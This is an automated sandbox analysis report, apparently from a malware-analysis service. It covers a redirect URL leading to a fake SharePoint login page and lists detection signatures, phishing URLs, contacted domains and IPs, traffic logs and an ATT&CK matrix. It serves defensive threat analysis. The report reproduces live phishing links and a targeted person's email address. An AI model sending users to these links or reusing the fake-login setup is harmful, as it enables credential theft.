Play interactive tour

Edit tour

Analysis Report https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr

Overview

General Information

Sample URL:	https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr
Analysis ID:	323643
Most interesting Screenshot:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected HtmlPhish_10

Phishing site detected (based on logo template match)

HTML body contains low number of good links

HTML title does not match URL

Suspicious form URL found

URL contains potential PII (phishing indication)

Classification

Startup

System is w10x64

iexplore.exe (PID: 3096 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4872 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3096 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr

UrlScan: detection malicious, Label: phishing brand: sharepoint

Perma Link

Antivirus detection for URL or domain

Show sources

Source: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#news	SlashNext: Label: Fake Login Page type: Phishing & Social Engineering
Source: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#home	SlashNext: Label: Fake Login Page type: Phishing & Social Engineering
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	UrlScan: Label: phishing brand: sharepoint	Perma Link
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk	Avira URL Cloud: Label: phishing

Phishing:

Yara detected HtmlPhish_10

Show sources

Source: Yara match

File source: 609290.pages.csv, type: HTML

Phishing site detected (based on logo template match)

Show sources

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377

Matcher: Template: sharepoint matched

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Number of links: 0
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Number of links: 0

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Title: Sign \| SharePoint does not match URL
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Title: Sign \| SharePoint does not match URL

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Form action: send.php
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: Form action: send.php

Source: https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr

Sample URL: PII: prampon@soteb.fr

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: No <meta name="author".. found
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: No <meta name="author".. found

Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: No <meta name="copyright".. found
Source: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	HTTP Parser: No <meta name="copyright".. found

Source: global traffic	HTTP traffic detected: GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: icons.iconarchive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1User-Agent: AutoItHost: icons.iconarchive.comIf-Modified-Since: Sat, 27 Jun 2020 10:27:29 GMTIf-None-Match: "5ef71f11-23c7"Cookie: __cfduid=d7eb16b95148e3cf626e501729a40ba461606466109

Source: gtm[1].js.2.dr	String found in binary or memory: "vtp_html":"\n\u003Cscript type=\"text\/gtmscript\"\u003E!function(b,e,f,g,a,c,d){b.fbq\|\|(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq\|\|(b._fbq=a),a.push=a,a.loaded=!0,a.version=\"2.0\",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,\"script\",\"https:\/\/connect.facebook.net\/en_US\/fbevents.js\");fbq(\"init\",\"1103530543356374\");fbq(\"track\",\"PageView\");\u003C\/script\u003E\n\u003Cnoscript\u003E\n \u003Cimg height=\"1\" width=\"1\" src=\"https:\/\/www.facebook.com\/tr?id=1103530543356374\u0026amp;ev=PageView\n\u0026amp;noscript=1\"\u003E\n\u003C\/noscript\u003E\n", equals www.facebook.com (Facebook)
Source: fbevents[1].js.2.dr	String found in binary or memory: (function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performance&&a.performance.now&&a.performance.now();if(!function(){var b=a.postMessage\|\|function(){};if(!f){b({action:"FB_LOG",logType:"Facebook Pixel Error",logMessage:"Pixel code is not installed correctly on this page"},"");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules\|\|(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]\|\|(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)\|\|(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("signalsFBEventsGetIwlUrl",function(){return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=f.getFbeventsModules("signalsFBEventsGetTier");e.exports=function(b,c){c=a(c);c=c==null?"www.facebook.com":"www."+c+".facebook.com";return"https://"+c+"/signals/iwl.js?pixel_id="+b}})();return e.exports}(a,b,c,d)});f.ensureModuleRegistered("signalsFBEventsGetTier",function(){return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEvents.plugins.iwlbootstrapper",function(){return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var c=f.getFbeventsModules("SignalsFBEventsIWLBootStrapEvent"),d=f.getFbeventsModules("SignalsFBEventsLogging"),g=f.getFbeventsModules("SignalsFBEventsNetworkConfig"),h=f.getFbeventsModules("SignalsFBEventsPlugin"),i=f.getFbeventsModules("signalsFBEventsGetIwlUrl"),j=f.getFbeventsModules("signalsFBEventsGetTier"),k=d.logUserError,l=/^https:\/\/.\.facebook\.com$/i,m="FACEBOOK_IWL_CONFIG_STORAGE_KEY",n=a.sessionStorage?a.sessionStorage:{getItem:function(a){return null},removeItem:function(a){},setItem:function(a,b){}};e.exports=new h(function(d,e){function h(c,d){var e=b.createElement("script");e.async=!0;e.onload=function(){if(!a.FacebookIWL\|\|!a.FacebookIWL.init)return;var b=j(g.ENDPOINT);b!=null&&a.FacebookIWL.set&&a.FacebookIWL.set("tier",b);d()};a.FacebookIWLSessionEnd=function(){n.removeItem(m),a.close()};e.src=i(c,g.ENDPOINT);b.body&&b.body.appendChild(e)}var o=!1,p=function(a){return!!(e&&e.pixelsByID&&Object.prototype.hasOwnProperty.call(e.pixelsByID,a))};function q(){if(o)return;var b=n.getItem(m);if(!b)return;b=JSON.parse(b);var c=b.pixelID,d=b.graphToken,e=b.sessionStartTime;o=!0;h(c,function(){var b=p(c)?c:null;a.FacebookIWL.init(b,d,e)})}function r(b){if(o)return;h(b,func

Source: unknown

DNS traffic detected: queries for: mincast.us-south.cf.appdomain.cloud

Source: fontawesome-webfont[1].eot.2.dr, font-awesome.min[1].css.2.dr	String found in binary or memory: http://fontawesome.io
Source: font-awesome.min[1].css.2.dr	String found in binary or memory: http://fontawesome.io/license
Source: fontawesome-webfont[1].eot.2.dr	String found in binary or memory: http://fontawesome.io/license/
Source: fontawesome-webfont[1].eot.2.dr	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: bootstrap.min[1].js.2.dr	String found in binary or memory: http://getbootstrap.com)
Source: imagestore.dat.2.dr	String found in binary or memory: http://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png
Source: jquery-ui.min[1].js.2.dr	String found in binary or memory: http://jqueryui.com
Source: jquery-ui[1].css.2.dr	String found in binary or memory: http://jqueryui.com/themeroller/?ffDefault=Verdana%2CArial%2Csans-serif&fwDefault=normal&fsDefault=1
Source: popper.js[1].js.2.dr	String found in binary or memory: http://opensource.org/licenses/MIT).
Source: scripts[1].js.2.dr	String found in binary or memory: http://stackoverflow.com/a/2866613
Source: style[1].css0.2.dr	String found in binary or memory: http://stackoverflow.com/questions/10387740/five-equal-columns-in-twitter-bootstrap/22799354#2279935
Source: scripts[1].js.2.dr	String found in binary or memory: http://stackoverflow.com/questions/411352/how-best-to-determine-if-an-argument-is-not-sent-to-the-ja
Source: KFOlCnqEu92Fr1MmYUtfBBc9[1].ttf.2.dr, KFOmCnqEu92Fr1Mu4mxP[1].ttf.2.dr, KFOlCnqEu92Fr1MmEU9fBBc9[1].ttf.2.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: style[1].css.2.dr	String found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: magiczoom[1].js.2.dr	String found in binary or memory: http://www.magictoolbox.com/license/
Source: style[1].css.2.dr	String found in binary or memory: http://www.navigatormm.com
Source: style[1].css.2.dr	String found in binary or memory: http://www.navigatormm.com/chimera
Source: gtm[1].js.2.dr	String found in binary or memory: https://adservice.google.com/ddm/regclk
Source: analytics[1].js.2.dr	String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: scripts[1].js0.2.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CustomEvent/CustomEvent
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: css[1].css.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoCjC3jsGyL.woff)
Source: bootstrap_002.js[1].js.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: bootstrap.js[1].js.2.dr	String found in binary or memory: https://getbootstrap.com/)
Source: gtm[1].js.2.dr	String found in binary or memory: https://github.com/krux/postscribe/blob/master/LICENSE.
Source: bootstrap_002.js[1].js.2.dr, bootstrap.min[1].css.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: bootstrap_002.js[1].js.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: {E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	String found in binary or memory: https://j123.eu-gb.Root
Source: {E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	String found in binary or memory: https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk
Source: gtm[1].js.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: analytics[1].js.2.dr	String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: analytics[1].js.2.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: analytics[1].js.2.dr	String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: gtm[1].js.2.dr	String found in binary or memory: https://www.google.com
Source: recaptcha__en[1].js.2.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: recaptcha__en[1].js.2.dr, anchor[1].htm.2.dr, api[1].js.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: ~DFF335FDC517C7DD21.TMP.1.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfWmtcUAAAAAOJYBUg1otF0emmfkBJXOL8F-Tsa&co=aHR0
Source: gtm[1].js.2.dr	String found in binary or memory: https://www.googletagmanager.com/debug/bootstrap
Source: analytics[1].js.2.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: webworker[1].js.2.dr, anchor[1].htm.2.dr, api[1].js.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/recaptcha__en.js
Source: anchor[1].htm.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/styles__ltr.css
Source: {E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	String found in binary or memory: https://www.premierpawappdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk
Source: {E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	String found in binary or memory: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpRoot
Source: ~DFF335FDC517C7DD21.TMP.1.dr	String found in binary or memory: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=153958532

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: classification engine

Classification label: mal68.phis.win@3/60@8/6

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFE3365AA569982C87.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3096 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3096 CREDAT:17410 /prefetch:2

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr	0%	Avira URL Cloud	safe
https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr	100%	UrlScan	phishing brand: sharepoint	Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
j123.eu-gb.cf.appdomain.cloud	2%	Virustotal	Browse
www.google.co.uk	0%	Virustotal	Browse
premierpawn.com	0%	Virustotal	Browse
mincast.us-south.cf.appdomain.cloud	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#news	100%	SlashNext	Fake Login Page type: Phishing & Social Engineering
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#home	100%	SlashNext	Fake Login Page type: Phishing & Social Engineering
https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	100%	UrlScan	phishing brand: sharepoint	Browse
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	0%	Avira URL Cloud	safe
https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk	100%	Avira URL Cloud	phishing
https://j123.eu-gb.Root	0%	Avira URL Cloud	safe
https://getbootstrap.com)	0%	Avira URL Cloud	safe
https://www.google.%/ads/ga-audiences	0%	URL Reputation	safe
https://www.google.%/ads/ga-audiences	0%	URL Reputation	safe
https://www.google.%/ads/ga-audiences	0%	URL Reputation	safe
http://getbootstrap.com)	0%	Avira URL Cloud	safe
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=153958532	0%	Avira URL Cloud	safe
https://www.premierpawappdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk	0%	Avira URL Cloud	safe
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpRoot	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
scontent.xx.fbcdn.net	31.13.92.14	true	false		high
icons.iconarchive.com	172.67.212.166	true	false		high
stats.l.doubleclick.net	74.125.128.155	true	false		high
j123.eu-gb.cf.appdomain.cloud	158.175.115.200	true	false	2%, Virustotal, Browse	unknown
www.google.co.uk	216.58.215.227	true	false	0%, Virustotal, Browse	unknown
premierpawn.com	149.56.20.211	true	false	0%, Virustotal, Browse	unknown
mincast.us-south.cf.appdomain.cloud	169.46.89.154	true	false	0%, Virustotal, Browse	unknown
www.premierpawn.com	unknown	unknown	false		unknown
connect.facebook.net	unknown	unknown	false		high
stats.g.doubleclick.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488#:h88933aJjkvU053dh2qESwbhSn=aJjkvU053dh2qESwbh39377	true	100%, UrlScan, Browse	unknown
http://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontawesome.io	fontawesome-webfont[1].eot.2.dr, font-awesome.min[1].css.2.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	KFOlCnqEu92Fr1MmYUtfBBc9[1].ttf.2.dr, KFOmCnqEu92Fr1Mu4mxP[1].ttf.2.dr, KFOlCnqEu92Fr1MmEU9fBBc9[1].ttf.2.dr	false		high
http://www.navigatormm.com/chimera	style[1].css.2.dr	false		high
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	fontawesome-webfont[1].eot.2.dr	false	Avira URL Cloud: safe	unknown
http://jqueryui.com	jquery-ui.min[1].js.2.dr	false		high
https://getbootstrap.com/)	bootstrap.js[1].js.2.dr	false		high
https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk	{E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	false	Avira URL Cloud: phishing	unknown
http://www.magictoolbox.com/license/	magiczoom[1].js.2.dr	false		high
http://fontawesome.io/license	font-awesome.min[1].css.2.dr	false		high
http://jqueryui.com/themeroller/?ffDefault=Verdana%2CArial%2Csans-serif&fwDefault=normal&fsDefault=1	jquery-ui[1].css.2.dr	false		high
https://developer.mozilla.org/en-US/docs/Web/API/CustomEvent/CustomEvent	scripts[1].js0.2.dr	false		high
http://fontawesome.io/license/	fontawesome-webfont[1].eot.2.dr	false		high
https://j123.eu-gb.Root	{E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/graphs/contributors)	bootstrap_002.js[1].js.2.dr	false		high
http://stackoverflow.com/questions/411352/how-best-to-determine-if-an-argument-is-not-sent-to-the-ja	scripts[1].js.2.dr	false		high
https://getbootstrap.com)	bootstrap_002.js[1].js.2.dr	false	Avira URL Cloud: safe	low
